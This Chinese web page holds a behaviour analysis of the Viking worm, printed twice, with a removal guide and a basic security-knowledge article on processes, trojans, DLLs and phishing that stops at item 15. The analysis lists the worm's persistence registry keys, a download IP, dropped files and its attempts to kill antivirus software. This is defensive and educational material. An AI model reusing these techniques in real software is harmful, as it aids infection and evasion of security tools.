該病毒屬蠕蟲類,病毒運行后釋放病毒文件%WINDDIR%\rundl132.exe、系統(tǒng)盤根目錄\_desktop.ini、%Program Files%\_desktop.ini、桌面\viDll.dll,會在大量文件夾中釋放文件_desktop.ini;連接網(wǎng)絡(luò),開啟端口,下載病毒文件%WINDDIR%\0sy.exe、%WINDDIR%\1sy.exe、%WINDDIR%\2sy.exe;開啟進程conime.exe及其自身,注入到進程explorer.exe中,修改注冊表,添加啟動項,以達到隨機啟動的目的;感染大部分非系統(tǒng)文件;病毒把自身加入到要感染的程序,在被感染的程序運行時,病毒也同時運行,但在運行一次后自動釋放病毒體,被感染文件也恢復正常,隔段時間后病毒會再次感染此應(yīng)用程序;病毒嘗試終止相關(guān)殺病毒軟件;病毒主要通過共享目錄、文件捆綁、運行被感染病毒的程序、可帶病毒的郵件附件等方式進行傳播。
1、病毒運行后釋放病毒文件:
%WINDDIR%\rundl132.exe
%Program Files%\_desktop.ini
桌面\viDll.dll
系統(tǒng)根目錄\_desktop.ini
系統(tǒng)根目錄\1.txt
系統(tǒng)根目錄\MH_FILE\MH_DLL.dll
系統(tǒng)根目錄\TODAYZTKING\TODAYZTKING.dll
會在大量文件夾中釋放文件_desktop.ini
2、連接網(wǎng)絡(luò),開啟端口,下載病毒文件:
協(xié)議:TCP
IP:61.152.116.22
本地端口:隨機開啟本地1024以上端口,如:1156
下載病毒文件:
路徑名:
%WINDDIR%\0sy.exe
%WINDDIR%\1sy.exe
%WINDDIR%\2sy.exe
病毒名:
Trojan-PSW.Win32.WOW.ek
Trojan-PSW.Win32.WOW.fq
Trojan-PSW.Win32.WOW.fs
3、開啟進程conime.exe及其自身,注入到進程explorer.exe中。
4、修改注冊表,添加啟動項,以達到隨機啟動的目的:
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows
鍵值: 字串: "load "="C:\WINDOWS\rundl132.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
鍵值: 字串: "ver_down0"="0.859: Source:C:\WINDOWS\system32\_0000012_.tmp.dll (3.0.3790.218001111)"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
鍵值: 字串: " ver_down1"="0.687: 2006/06/13 20:52:04.23s444 (local)"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
鍵值: 字串: " ver_down2"="0.859: Source:C:\WINDOWS\system32\_000006_.tmp.dll (3.0.3790.21801)"
HKEY_LOCAL_MACHINE\SOFTWARE\Soft\
HKEY_LOCAL_MACHINE\SOFTWARE\Soft\DownloadWWW\
HKEY_LOCAL_MACHINE\SOFTWARE\Soft\DownloadWWW\auto
鍵值: 字串: "1"
5、感染大部分非系統(tǒng)文件,不感染下列文件夾中的文件:
system
system32
Documents and Settings
System Volume Information
Recycled
windor
Windows NT
WindowsUpdate
Windows Media Player
Internet Explorer
ComPlus Applications
NetMeeting
Common Files
Messenger
Microsoft Office
InstallShield Installation Information
6、病毒嘗試終止相關(guān)殺病毒軟件。
7、病毒把自己身加入到要感染的程序,在被感染的程序運行時,病毒也同時運行,但在運行一次后自動釋放病毒體,被感染文件也恢復正常,隔段時間后病毒會再次感染此應(yīng)用程序。
8、病毒主要通過共享目錄、文件捆綁、運行被感染病毒的程序、可帶病毒的郵件附件等方式進行傳播。
注:% System%是一個可變路徑。病毒通過查詢操作系統(tǒng)來決定當前System文件夾的位置。Windows2000/NT中默認的安裝路徑是C:\Winnt\System32,windows95/98/me中默認的安裝路徑是C:\Windows\System,windowsXP中默認的安裝路徑是C:\Windows\System32。
這幾天被病毒害苦了,到處都是_desktop.ini
網(wǎng)上搜了一下。。基本搞定, 下面這個方法不錯。
批量刪除_desktop.ini的命令
現(xiàn)在使用DOS命令批量刪除_desktop.ini,如下:
del d:\_desktop.ini /f/s/q/a
強制刪除d盤下所有目錄內(nèi)(包括d盤本身)的_desktop.ini文件并且不提示是否刪除
/f 強制刪除只讀文件
/q 指定靜音狀態(tài)。不提示您確認刪除。
/s 從當前目錄及其所有子目錄中刪除指定文件。顯示正在被刪除的文件名。
/a的意思是按照屬性來刪除了
這個命令的作用是在殺掉viking病毒之后清理系統(tǒng)內(nèi)殘留的_desktop.ini文件用的
手動清除方案:
1、手工清除請按照行為分析刪除對應(yīng)文件,恢復相關(guān)系統(tǒng)設(shè)置。
(1) 使用“進程管理”關(guān)閉病毒進程
(2) 刪除病毒文件
%WINDDIR%\rundl132.exe
%Program Files%\_desktop.ini
桌面\viDll.dll
系統(tǒng)根目錄\_desktop.ini
系統(tǒng)根目錄\1.txt
系統(tǒng)根目錄\MH_FILE\MH_DLL.dll
系統(tǒng)根目錄\TODAYZTKING\TODAYZTKING.dll
會在大量文件夾中釋放文件_desktop.ini
%WINDDIR%\0sy.exe
%WINDDIR%\1sy.exe
%WINDDIR%\2sy.exe
(3) 恢復病毒修改的注冊表項目,刪除病毒添加的注冊表項
HKEY_CURRENT_USER\Software\Microsoft\Windows NT
\CurrentVersion\Windows
鍵值: 字串: "load "="C:\WINDOWS\rundl132.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
鍵值: 字串: "ver_down0"="0.859: Source:C:\WINDOWS\system32\_0000012_.tmp.dll (3.0.3790.218001111)"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
鍵值: 字串: " ver_down1"="0.687: 2006/06/13 20:52:04.23s444 (local)"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
鍵值: 字串: " ver_down2"="0.859: Source:C:\WINDOWS\system32\_000006_.tmp.dll
(3.0.3790.21801)"
HKEY_LOCAL_MACHINE\SOFTWARE\Soft\
HKEY_LOCAL_MACHINE\SOFTWARE\Soft\DownloadWWW\
HKEY_LOCAL_MACHINE\SOFTWARE\Soft\DownloadWWW\auto
鍵值: 字串: "1"
下面是病毒的詳細資料:
病毒名稱: Worm.Win32.Viking.p
病毒類型: 蠕蟲
文件 MD5: E939658C090087B08A1CD498F2DB59B3
公開范圍: 完全公開
危害等級: 中
文件長度: 1,025,308 字節(jié)
感染系統(tǒng): windows98以上版本
開發(fā)工具: Borland Delphi V3.0
加殼類型: Upack 2.4 - 2.9 beta
命名對照: Symentec[W32.Looked.P]
Mcafee[無]
該病毒屬蠕蟲類,病毒運行后釋放病毒文件%WINDDIR%\rundl132.exe、系統(tǒng)盤根目錄\_desktop.ini、%Program Files%\_desktop.ini、桌面\viDll.dll,會在大量文件夾中釋放文件_desktop.ini;連接網(wǎng)絡(luò),開啟端口,下載病毒文件%WINDDIR%\0sy.exe、%WINDDIR%\1sy.exe、%WINDDIR%\2sy.exe;開啟進程conime.exe及其自身,注入到進程explorer.exe中,修改注冊表,添加啟動項,以達到隨機啟動的目的;感染大部分非系統(tǒng)文件;病毒把自身加入到要感染的程序,在被感染的程序運行時,病毒也同時運行,但在運行一次后自動釋放病毒體,被感染文件也恢復正常,隔段時間后病毒會再次感染此應(yīng)用程序;病毒嘗試終止相關(guān)殺病毒軟件;病毒主要通過共享目錄、文件捆綁、運行被感染病毒的程序、可帶病毒的郵件附件等方式進行傳播。
1、病毒運行后釋放病毒文件:
%WINDDIR%\rundl132.exe
%Program Files%\_desktop.ini
桌面\viDll.dll
系統(tǒng)根目錄\_desktop.ini
系統(tǒng)根目錄\1.txt
系統(tǒng)根目錄\MH_FILE\MH_DLL.dll
系統(tǒng)根目錄\TODAYZTKING\TODAYZTKING.dll
會在大量文件夾中釋放文件_desktop.ini
2、連接網(wǎng)絡(luò),開啟端口,下載病毒文件:
協(xié)議:TCP
IP:61.152.116.22
本地端口:隨機開啟本地1024以上端口,如:1156
下載病毒文件:
路徑名:
%WINDDIR%\0sy.exe
%WINDDIR%\1sy.exe
%WINDDIR%\2sy.exe
病毒名:
Trojan-PSW.Win32.WOW.ek
Trojan-PSW.Win32.WOW.fq
Trojan-PSW.Win32.WOW.fs
3、開啟進程conime.exe及其自身,注入到進程explorer.exe中。
4、修改注冊表,添加啟動項,以達到隨機啟動的目的:
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows
鍵值: 字串: "load "="C:\WINDOWS\rundl132.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
鍵值: 字串: "ver_down0"="0.859: Source:C:\WINDOWS\system32\_0000012_.tmp.dll (3.0.3790.218001111)"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
鍵值: 字串: " ver_down1"="0.687: 2006/06/13 20:52:04.23s444 (local)"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
鍵值: 字串: " ver_down2"="0.859: Source:C:\WINDOWS\system32\_000006_.tmp.dll (3.0.3790.21801)"
HKEY_LOCAL_MACHINE\SOFTWARE\Soft\
HKEY_LOCAL_MACHINE\SOFTWARE\Soft\DownloadWWW\
HKEY_LOCAL_MACHINE\SOFTWARE\Soft\DownloadWWW\auto
鍵值: 字串: "1"
5、感染大部分非系統(tǒng)文件,不感染下列文件夾中的文件:
system
system32
Documents and Settings
System Volume Information
Recycled
windor
Windows NT
WindowsUpdate
Windows Media Player
Internet Explorer
ComPlus Applications
NetMeeting
Common Files
Messenger
Microsoft Office
InstallShield Installation Information
6、病毒嘗試終止相關(guān)殺病毒軟件。
7、病毒把自己身加入到要感染的程序,在被感染的程序運行時,病毒也同時運行,但在運行一次后自動釋放病毒體,被感染文件也恢復正常,隔段時間后病毒會再次感染此應(yīng)用程序。
8、病毒主要通過共享目錄、文件捆綁、運行被感染病毒的程序、可帶病毒的郵件附件等方式進行傳播。
注:% System%是一個可變路徑。病毒通過查詢操作系統(tǒng)來決定當前System文件夾的位置。Windows2000/NT中默認的安裝路徑是C:\Winnt\System32,windows95/98/me中默認的安裝路徑是C:\Windows\System,windowsXP中默認的安裝路徑是C:\Windows\System32。
十七點安全知識詳細了解進程和病毒
[ 2007-03-25 03:48:35 | 作者: sun ]
第一:進程是什么
進程為應(yīng)用程序的運行實例,是應(yīng)用程序的一次動態(tài)執(zhí)行。看似高深,我們可以簡單地理解為:它是操作系統(tǒng)當前運行的執(zhí)行程序。在系統(tǒng)當前運行的執(zhí)行程序里包括:系統(tǒng)管理計算機個體和完成各種操作所必需的程序;用戶開啟、執(zhí)行的額外程序,當然也包括用戶不知道,而自動運行的非法程序(它們就有可能是病毒程序)。
危害較大的可執(zhí)行病毒同樣以“進程”形式出現(xiàn)在系統(tǒng)內(nèi)部(一些病毒可能并不被進程列表顯示,如“宏病毒”),那么及時查看并準確殺掉非法進程對于手工殺毒有起著關(guān)鍵性的作用。
第二:什么是木馬
木馬病毒源自古希臘特洛伊戰(zhàn)爭中著名的“木馬計”而得名,顧名思義就是一種偽裝潛伏的網(wǎng)絡(luò)病毒,等待時機成熟就出來害人。
傳染方式:通過電子郵件附件發(fā)出,捆綁在其他的程序中。
病毒特性:會修改注冊表、駐留內(nèi)存、在系統(tǒng)中安裝后門程序、開機加載附帶的木馬。
木馬病毒的破壞性:木馬病毒的發(fā)作要在用戶的機器里運行客戶端程序,一旦發(fā)作,就可設(shè)置后門,定時地發(fā)送該用戶的隱私到木馬程序指定的地址,一般同時內(nèi)置可進入該用戶電腦的端口,并可任意控制此計算機,進行文件刪除、拷貝、改密碼等非法操作。
防范措施:用戶提高警惕,不下載和運行來歷不明的程序,對于不明來歷的郵件附件也不要隨意打開。
第三:什么是計算機病毒
計算機病毒是一個程序,一段可執(zhí)行碼。就像生物病毒一樣,計算機病毒有獨特的復制能力。計算機病毒可以很快地蔓延,又常常難以根除。它們能把自身附著在各種類型的文件上。當文件被復制或從一個用戶傳送到另一個用戶時,它們就隨同文件一起蔓延開來。
除復制能力外,某些計算機病毒還有其它一些共同特性:一個被污染的程序能夠傳送病毒載體。當你看到病毒載體似乎僅僅表現(xiàn)在文字和圖象上時,它們可能也已毀壞了文件、再格式化了你的硬盤驅(qū)動或引發(fā)了其它類型的災(zāi)害。若是病毒并不寄生于一個污染程序,它仍然能通過占據(jù)存貯空間給你帶來麻煩,并降低你的計算機的全部性能。可以從不同角度給出計算機病毒的定義。一種定義是通過磁盤、磁帶和網(wǎng)絡(luò)等作為媒介傳播擴散,能“傳染” 其他程序的程序。另一種是能夠?qū)崿F(xiàn)自身復制且借助一定的載體存在的具有潛伏性、傳染性和破壞性的程序。還有的定義是一種人為制造的程序,它通過不同的途徑潛伏或寄生在存儲媒體(如磁盤、內(nèi)存)或程序里。當某種條件或時機成熟時,它會自生復制并傳播,使計算機的資源受到不同程序的破壞等等。這些說法在某種意義上借用了生物學病毒的概念,計算機病毒同生物病毒所相似之處是能夠侵入計算機系統(tǒng)和網(wǎng)絡(luò),危害正常工作的“病原體”。它能夠?qū)τ嬎銠C系統(tǒng)進行各種破壞,同時能夠自我復制, 具有傳染性。
所以, 計算機病毒就是能夠通過某種途徑潛伏在計算機存儲介質(zhì)(或程序)里, 當達到某種條件時即被激活的具有對計算機資源進行破壞作用的一組程序或指令集合。
第四:什么是蠕蟲病毒
蠕蟲病毒是計算機病毒的一種。它的傳染機理是利用網(wǎng)絡(luò)進行復制和傳播,傳染途徑是通過網(wǎng)絡(luò)和電子郵件。
比如近幾年危害很大的“尼姆達”病毒就是蠕蟲病毒的一種。這一病毒利用了微軟視窗操作系統(tǒng)的漏洞,計算機感染這一病毒后,會不斷自動撥號上網(wǎng),并利用文件中的地址信息或者網(wǎng)絡(luò)共享進行傳播,最終破壞用戶的大部分重要數(shù)據(jù)。
蠕蟲病毒的一般防治方法是:使用具有實時監(jiān)控功能的殺毒軟件,并且注意不要輕易打開不熟悉的郵件附件。
第五:什么是廣告軟件Adware
廣告軟件(Adware)是指 未經(jīng)用戶允許,下載并安裝或與其他軟件捆綁通過彈出式廣告或以其他形式進行商業(yè)廣告宣傳的程序。安裝廣告軟件之后,往往造成系統(tǒng)運行緩慢或系統(tǒng)異常。
防治廣告軟件,應(yīng)注意以下方面:
1、不要輕易安裝共享軟件或“免費軟件”,這些軟件里往往含有廣告程序、間諜軟件等不良軟件,可能帶來安全風險。
2、有些廣告軟件通過惡意網(wǎng)站安裝,所以,不要瀏覽不良網(wǎng)站。
3、采用安全性比較好的網(wǎng)絡(luò)瀏覽器,并注意彌補系統(tǒng)漏洞。
第六:什么是間諜軟件Spyware
間諜軟件(Spyware)是能夠在使用者不知情的情況下,在用戶電腦上安裝后門程序的軟件。 用戶的隱私數(shù)據(jù)和重要信息會被那些后門程序捕獲, 甚至這些 “后門程序” 還能使黑客遠程操縱用戶的電腦。
防治間諜軟件,應(yīng)注意以下方面:
1、不要輕易安裝共享軟件或“免費軟件”,這些軟件里往往含有廣告程序、間諜軟件等不良軟件,可能帶來安全風險。
2、有些間諜軟件通過惡意網(wǎng)站安裝,所以,不要瀏覽不良網(wǎng)站。
3、采用安全性比較好的網(wǎng)絡(luò)瀏覽器,并注意彌補系統(tǒng)漏洞。
第七:Dll文件是什么
DLL是Dynamic Link Library的縮寫,意為動態(tài)鏈接庫。在Windows中,許多應(yīng)用程序并不是一個完整的可執(zhí)行文件,它們被分割成一些相對獨立的動態(tài)鏈接庫,即DLL文件,放置于系統(tǒng)中。當我們執(zhí)行某一個程序時,相應(yīng)的DLL文件就會被調(diào)用。一個應(yīng)用程序可有多個DLL文件,一個DLL文件也可能被幾個應(yīng)用程序所共用,這樣的DLL文件被稱為共享DLL文件。DLL文件一般被存放在C:\WindowsSystem目錄下。
1、如何了解某應(yīng)用程序使用哪些DLL文件
右鍵單擊該應(yīng)用程序并選擇快捷菜單中的“快速查看”命令,在隨后出現(xiàn)的“快速查看”窗口的“引入表”一欄中你將看到其使用DLL文件的情況。
2、如何知道DLL文件被幾個程序使用
運行Regedit,進入HKEY_LOCAL_MACHINESoftwareMicrosrftWindowsCurrent-
ersionSharedDlls子鍵查看,其右邊窗口中就顯示了所有DLL文件及其相關(guān)數(shù)據(jù),其中數(shù)據(jù)右邊小括號內(nèi)的數(shù)字就說明了被幾個程序使用,(2)表示被兩個程序使用,(0)則表示無程序使用,可以將其刪除。
3、如何解決DLL文件丟失的情況
有時在卸載文件時會提醒你刪除某個DLL文件可能會影響其他應(yīng)用程序的運行。所以當你卸載軟件時,就有可能誤刪共享的DLL文件。一旦出現(xiàn)了丟失DLL文件的情況,如果你能確定其名稱,可以在Sysbckup(系統(tǒng)備份文件夾)中找到該DLL文件,將其復制到System文件夾中。如果這樣不行,在電腦啟動時又總是出現(xiàn)“***dll文件丟失……”的提示框,你可以在“開始/運行”中運行Msconfig,進入系統(tǒng)配置實用程序?qū)υ捒蛞院螅瑔螕暨x擇“System.ini”標簽,找出提示丟失的DLL文件,使其不被選中,這樣開機時就不會出現(xiàn)錯誤提示了。
rundll的功能是以命令列的方式呼叫Windows的動態(tài)鏈結(jié)庫。
Rundll32.exe與Rundll.exe的區(qū)別就在于前者是呼叫32位的鏈結(jié)庫,后者是用于16位的鏈結(jié)庫。rundll32.exe是專門用來調(diào)用dll文件的程序。
如果用的是Win98,rundll32.exe一般存在于Windows目錄下;
如果用的WinXP,rundll32.exe一般存在于WindowsSystem32目錄下。
若是在其它目錄,就可能是一個木馬程序,它會偽裝成rundll32.exe。
第八:什么是系統(tǒng)進程
進程是指在系統(tǒng)中正在運行的一個應(yīng)用程序;線程是系統(tǒng)分配處理器時間資源的基本單元,或者說進程之內(nèi)獨立執(zhí)行的一個單元。對于操 作系統(tǒng)而言,其調(diào)度單元是線程。一個進程至少包括一個線程,通常將該線程稱為主線程。一個進程從主線程的執(zhí)行開始進而創(chuàng)建一個或多個附加線程,就是所謂基于多線程的多任務(wù)。
那進程與線程的區(qū)別到底是什么?進程是執(zhí)行程序的實例。例如,當你運行記事本程序(Nodepad)時,你就創(chuàng)建了一個用來容納組成Notepad.exe的代碼及其所需調(diào)用動態(tài)鏈接庫的進程。每個進程均運行在其專用且受保護的地址空間內(nèi)。因此,如果你同時運行記事本的兩個拷貝,該程序正在使用的數(shù)據(jù)在各自實例中是彼此獨立的。在記事本的一個拷貝中將無法看到該程序的第二個實例打開的數(shù)據(jù)。
以沙箱為例進行闡述。一個進程就好比一個沙箱。線程就如同沙箱中的孩子們。孩子們在沙箱子中跑來跑去,并且可能將沙子攘到別的孩子眼中,他們會互相踢打或撕咬。但是,這些沙箱略有不同之處就在于每個沙箱完全由墻壁和頂棚封閉起來,無論箱中的孩子如何狠命地攘沙,他們也不會影響到其它沙箱中的其他孩子。因此,每個進程就象一個被保護起來的沙箱。未經(jīng)許可,無人可以進出。
實際上線程運行而進程不運行。兩個進程彼此獲得專用數(shù)據(jù)或內(nèi)存的唯一途徑就是通過協(xié)議來共享內(nèi)存塊。這是一種協(xié)作策略。下面讓我們分析一下任務(wù)管理器里的進程選項卡。
這里的進程是指一系列進程,這些進程是由它們所運行的可執(zhí)行程序?qū)嵗齺碜R別的,這就是進程選項卡中的第一列給出了映射名稱的原因。請注意,這里并沒有進程名稱列。進程并不擁有獨立于其所歸屬實例的映射名稱。換言之,如果你運行5個記事本拷貝,你將會看到5個稱為Notepad.exe的進程。它們是如何彼此區(qū)別的呢?其中一種方式是通過它們的進程ID,因為每個進程都擁有其獨一無二的編碼。該進程ID由Windows NT或Windows 2000生成,并可以循環(huán)使用。因此,進程ID將不會越編越大,它們能夠得到循環(huán)利用。
第三列是被進程中的線程所占用的CPU時間百分比。它不是CPU的編號,而是被進程占用的CPU時間百分比。此時我的系統(tǒng)基本上是空閑的。盡管系統(tǒng)看上去每一秒左右都只使用一小部分CPU時間,但該系統(tǒng)空閑進程仍舊耗用了大約99%的CPU時間。
第四列,CPU時間,是CPU被進程中的線程累計占用的小時、分鐘及秒數(shù)。請注意,我對進程中的線程使用占用一詞。這并不一定意味著那就是進程已耗用的CPU時間總和,因為,如我們一會兒將看到的,NT計時的方式是,當特定的時鐘間隔激發(fā)時,無論誰恰巧處于當前的線程中,它都將計算到CPU周期之內(nèi)。通常情況下,在大多數(shù)NT系統(tǒng)中,時鐘以10毫秒的間隔運行。每10毫秒NT的心臟就跳動一下。有一些驅(qū)動程序代碼片段運行并顯示誰是當前的線程。讓我們將CPU時間的最后10毫秒記在它的帳上。因此,如果一個線程開始運行,并在持續(xù)運行8毫秒后完成,接著,第二個線程開始運行并持續(xù)了2毫秒,這時,時鐘激發(fā),請猜一猜這整整10毫秒的時鐘周期到底記在了哪個線程的帳上?答案是第二個線程。因此,NT中存在一些固有的不準確性,而NT恰是以這種方式進行計時,實際情況也如是,大多數(shù)32位操作系統(tǒng)中都存在一個基于間隔的計時機制。請記住這一點,因為,有時當你觀察線程所耗用的CPU總和時,會出現(xiàn)盡管該線程或許看上去已運行過數(shù)十萬次,但其CPU時間占用量卻可能是零或非常短暫的現(xiàn)象,那么,上述解釋便是原因所在。上述也就是我們在任務(wù)管理器的進程選項卡中所能看到的基本信息列。
第九:什么是應(yīng)用程序
應(yīng)用程序指的是程序開發(fā)人員要開發(fā)的一個數(shù)據(jù)庫應(yīng)用管理系統(tǒng),它可以是一個單位的財務(wù)管理系統(tǒng)、人事管理系統(tǒng)等。(各種有關(guān)功能的窗口的集合構(gòu)成一個完整的應(yīng)用系統(tǒng),分發(fā)給各個終端用戶的就是一個應(yīng)用程序。
第十:如何察看正在運行的進程
察看正在運行的進程的方法有很多,最簡單就是使用Windows自帶的進程管理器察看正在運行的進程:同時按下“Ctl Alt Del”打開Windows進程管理器。點擊進程的標簽,即可察看系統(tǒng)中進行的進程列表。或者用鼠標右鍵點系統(tǒng)狀態(tài)欄“系統(tǒng)管理器”進入系統(tǒng)進程管理器。
第十一:如何強制結(jié)束一個運行中的進程
1、打開“終端服務(wù)管理器(任務(wù)管理器)”。
2、在“進程”選項卡上的“用戶”列下,右鍵單擊要結(jié)束的進程,然后單擊“結(jié)束進程”。
注意:
(1)必須具有完全控制權(quán)限才能結(jié)束進程。
(2)要打開“終端服務(wù)管理器”,請依次單擊“開始”和“控制面板”,雙擊“管理工具”,然后雙擊“終端服務(wù)管理器”。
(3)請注意:在沒有警告的情況下結(jié)束進程會導致用戶會話中的數(shù)據(jù)丟失。
(4)可能需要結(jié)束進程,因為應(yīng)用程序沒有響應(yīng)
(5)也可以使用 tskill 命令結(jié)束進程。
強制結(jié)束進程的命令行
Windows操作系統(tǒng)中只有System、SMSS.EXE和CSRSS.EXE不能殺。前兩個是純內(nèi)核態(tài)的,最后那個是Win32子系統(tǒng),ntsd本身需要它。ntsd從2000開始就是系統(tǒng)自帶的用戶態(tài)調(diào)試工具。被調(diào)試器附著(attach)的進程會隨調(diào)試器一起退出,所以可以用來在命令行下終止進程。使用ntsd自動就獲得了debug權(quán)限,從而能殺掉大部分的進程。ntsd會新開一個調(diào)試窗口,本來在純命令行下無法控制,但如果只是簡單的命令,比如退出(q),用-c參數(shù)從命令行傳遞就行了。Ntsd按照慣例也向軟件開發(fā)人員提供。只有系統(tǒng)開發(fā)人員使用此命令。有關(guān)詳細信息,請參閱 NTSD 中所附的幫助文件。用法:開個cmd.exe窗口,輸入:
ntsd -c q -p PID
把最后那個PID,改成你要終止的進程的ID。如果你不知道進程的ID,任務(wù)管理器->進程選項卡->查看->選擇列->勾上“PID(進程標識符)”,然后就能看見了。
XP下還有兩個好用的工具tasklist和tskill。tasklist能列出所有的進程,和相應(yīng)的信息。tskill能查殺進程,語法很簡單:tskill 程序名!
結(jié)束進程的一些巧用小竅門
誤刪VCD文件的另類恢復
現(xiàn)在很多人會把一些不錯的VCD直接拷入硬盤保存。但你是否誤刪過這些百看不厭的經(jīng)典之作呢?那么怎樣才能在不用恢復軟件的情況下手動恢復它們呢?
筆者找到了一個另類的恢復方法,并且效果還不錯。首先要知道誤刪的VCD文件的文件名和原文件存儲路徑。一般情況下VCD的主要視頻文件是VCD根目錄下的Mpegav文件夾,文件名一般為Avseq0?.dat或Music0?.dat,其中“?”代表數(shù)字(1~9)。有的VCD序幕和正式內(nèi)容是一個文件,即Avseq01.dat或Music01.dat;也有的VCD序幕和正式內(nèi)容分別為兩個文件,即序幕為Avseq01.dat或Music01.dat,而正式內(nèi)容為Avseq02.dat或Music02.dat。
首先,找一個和誤刪文件同名的文件(暫且稱為A),接著將A復制到原誤刪文件的同一文件夾中。在出現(xiàn)“正在復制...”窗口時,按下Ctrl+Alt+Del結(jié)束“正在復制...”任務(wù),如果“正在復制...”窗口不消失,就再次按下Ctrl+Alt+Del結(jié)束“正在復制...”任務(wù)。就這么簡單,到原誤刪文件存儲的地方看一下,是不是又失而復得了?用多媒體播放軟件打開,只是開頭幾秒種是文件A的內(nèi)容,后面的照看不誤。
保存拷了一部分的文件
如果你經(jīng)常會把MP3、CD、VCD、MPEG、RM等音、視頻文件(或其他類型的文件)從光盤中復制到硬盤,那么可能會遇到復制到只剩下一點點時,Windows提示“復制文件出錯”,這時只要按回車鍵或點擊“確定”按鈕,那么辛辛苦苦復制的文件就會丟失。
其實只要馬上激活“任務(wù)管理器”,把“出錯的對話框”和“正在復制”的任務(wù)都關(guān)閉掉。那么文件就會以原文件大小保存下來了,當然這還是有缺點的,當此類文件播放到斷點的地方時就會停止。
巧玩游戲
本人用的是Windows XP家庭版,運行一些支持Windows 2000但不支持Windows XP的游戲時,鼠標、鍵盤失去反應(yīng)。某日發(fā)現(xiàn)一解法:打開“任務(wù)管理器”,結(jié)束EXPLORER.EXE進程,點“新任務(wù)”,找到游戲運行文件,運行即可。另外,結(jié)束SVCHOST.exe(為當前用戶名的)進程可以去掉Windows XP風格。
第十二:一些常見的進程
進程名描述
smss.exeSessionManager
csrss.exe 子系統(tǒng)服務(wù)器進程
winlogon.exe管理用戶登錄
services.exe包含很多系統(tǒng)服務(wù)
lsass.exe 管理 IP 安全策略以及啟動 ISAKMP/Oakley (IKE) 和 IP 安全驅(qū)動程序。
svchost.exe Windows 2000/XP 的文件保護系統(tǒng)
SPOOLSV.EXE 將文件加載到內(nèi)存中以便遲后打印。
explorer.exe資源管理器
internat.exe托盤區(qū)的拼音圖標
mstask.exe允許程序在指定時間運行.
regsvc.exe允許遠程注冊表操作。(系統(tǒng)服務(wù))→remoteregister
tftpd.exe 實現(xiàn) TFTP Internet 標準。該標準不要求用戶名和密碼。
llssrv.exe證書記錄服務(wù)
ntfrs.exe 在多個服務(wù)器間維護文件目錄內(nèi)容的文件同步。
RsSub.exe 控制用來遠程儲存數(shù)據(jù)的媒體。
locator.exe 管理 RPC 名稱服務(wù)數(shù)據(jù)庫。
clipsrv.exe 支持“剪貼簿查看器”,以便可以從遠程剪貼簿查閱剪貼頁
msdtc.exe 并列事務(wù),是分布于兩個以上的數(shù)據(jù)庫,消息隊列,文件系統(tǒng)或其他事務(wù)保護資源
管理器。
grovel.exe掃描零備份存儲(SIS)卷上的重復文件,并且將重復文件指向一個數(shù)據(jù)存儲點,以
節(jié)省磁盤空間(只對 NTFS 文件系統(tǒng)有用)。
snmp.exe包含代理程序可以監(jiān)視網(wǎng)絡(luò)設(shè)備的活動并且向網(wǎng)絡(luò)控制臺工作站匯報。
以上這些進程都是對計算機運行起至關(guān)重要的,千萬不要隨意“殺掉”,否則可能直接影響系統(tǒng)的正常運行。
第十三:什么是網(wǎng)絡(luò)釣魚
什么是網(wǎng)絡(luò)釣魚?
網(wǎng)絡(luò)釣魚 (Phishing)攻擊者利用欺騙性的電子郵件和偽造的 Web 站點來進行網(wǎng)絡(luò)詐騙活動,受騙者往往會泄露自己的私人資料,如信用卡號、銀行卡賬戶、身份證號等內(nèi)容。詐騙者通常會將自己偽裝成網(wǎng)絡(luò)銀行、在線零售商和信用卡公司等可信的品牌,騙取用戶的私人信息。
如何防備網(wǎng)絡(luò)釣魚?
不要在網(wǎng)上留下可以證明自己身份的任何資料,包括手機號碼、身份證號、銀行卡號碼等。
不要把自己的隱私資料通過網(wǎng)絡(luò)傳輸,包括銀行卡號碼、身份證號、電子商務(wù)網(wǎng)站賬戶等資料不要通過QQ 、MSN 、Email 等軟件傳播,這些途徑往往可能被黑客利用來進行詐騙。
不要相信網(wǎng)上流傳的消息,除非得到權(quán)威途徑的證明。如網(wǎng)絡(luò)論壇、新聞組、 QQ 等往往有人發(fā)布謠言,伺機竊取用戶的身份資料等。
不要在網(wǎng)站注冊時透露自己的真實資料。例如住址、住宅電話、手機號碼、自己使用的銀行賬戶、自己經(jīng)常去的消費場所等。騙子們可能利用這些資料去欺騙你的朋友。
如果涉及到金錢交易、商業(yè)合同、工作安排等重大事項,不要僅僅通過網(wǎng)絡(luò)完成,有心計的騙子們可能通過這些途徑了解用戶的資料,伺機進行詐騙。
不要輕易相信通過電子郵件、網(wǎng)絡(luò)論壇等發(fā)布的中獎信息、促銷信息等,除非得到另外途徑的證明。正規(guī)公司一般不會通過電子郵件給用戶發(fā)送中獎信息和促銷信息,而騙子們往往喜歡這樣進行詐騙。
第十四:什么是瀏覽器劫持
瀏覽器劫持是一種惡意程序,通過DLL插件、BHO 、Winsock LSP 等形式 對用戶的瀏覽器進行篡改,使用戶瀏覽器出現(xiàn) 訪問正常網(wǎng)站時被轉(zhuǎn)向到惡意網(wǎng)頁、IE瀏覽器主頁 / 搜索頁等被修改為劫持軟件指定的網(wǎng)站地址等異常。
瀏覽器劫持如何防止,被劫持之后應(yīng)采取什么措施?
瀏覽器劫持分為多種不同的方式,從最簡單的修改IE默認搜索頁到最復雜的通過病毒修改系統(tǒng)設(shè)置并設(shè)置病毒守護進程,劫持瀏覽器,都有人采用。針對這些情況,用戶應(yīng)該采取如下措施:
不要輕易瀏覽不良網(wǎng)站。
不要輕易安裝共享軟件、盜版軟件。
建議使用安全性能比較高的瀏覽器,并可以針對自己的需要對瀏覽器的安全設(shè)置進行相應(yīng)調(diào)整。
如果給瀏覽器安裝插件,盡量從瀏覽器提供商的官方網(wǎng)站下載。
第十五:什么是惡意共享軟件
